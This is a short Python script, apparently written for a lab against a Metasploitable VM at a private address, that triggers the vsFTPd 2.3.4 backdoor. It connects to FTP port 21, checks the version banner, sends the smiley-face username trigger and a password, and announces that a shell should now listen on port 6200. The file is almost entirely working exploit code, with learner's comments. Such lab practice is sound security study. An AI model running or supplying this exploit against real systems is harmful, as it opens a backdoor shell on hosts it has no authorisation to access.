Metaspoitable_Python_Backdoor.py

import socket

#Defining our target (Metasploitable IP)
target_ip = "192.168.117.129"
target_port = 21

def trigger_backdoor():
    try: 
        # step 1.) creating a socket object (AF_INET = IPv4, SOCK_STREAM = TCP)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

        # step 2.) establishing a connection to the Metasploitable VM
        print(f"[*] Connecting to {target_ip} on port {target_port}")
        s.connect((target_ip, target_port)) 

        # step 3.) receiving the banner as well as verifying the version is specifically vsFTPd 2.3.4 (I did this just to have an extra challenge and add extra info when receiving the banner)
        raw_banner = s.recv(1024) 
        banner = raw_banner.decode().strip()
        print(f"[+] Server Banner: {banner}")
        # the bonus part of verifying ther version of the vulnerability
        if "vsFTPd 2.3.4" in banner:
            print("[!!!] Target is VULNERABLE to the vsFTPd backdoor! Currently sending trigger. . .")
     
            s.send(b"USER anonymous:)\r\n") #The trigger is sending a username that ends with the smiley :)
            s.recv(1024) #This is to receive the server's response
            s.send(b"PASS password\r\n") # The backdoor expects a password attempt to fully triger it
            
            print("[+] Trigger sent! The backdoor should now be open on Port 6200.")
        else:
            print("[*] Target system is running a different version, explotation is unlikely.")
        
        s.close() #This then closes the initial connection to port 21!

        #This else print is also just precaution in case somehow I incorrectly documented the version type
  
        #baner = s.recv(1024) .... (This is what I had initially scripted to recieve the banner, I wanted to have a bit more fun with the process here)
        #print(f"[+] Server Banner: {baner.decode().strip()}") 

    except Exception as e: 
        print(f"[!] Error: {e}") 

if __name__ == "__main__":
    trigger_backdoor()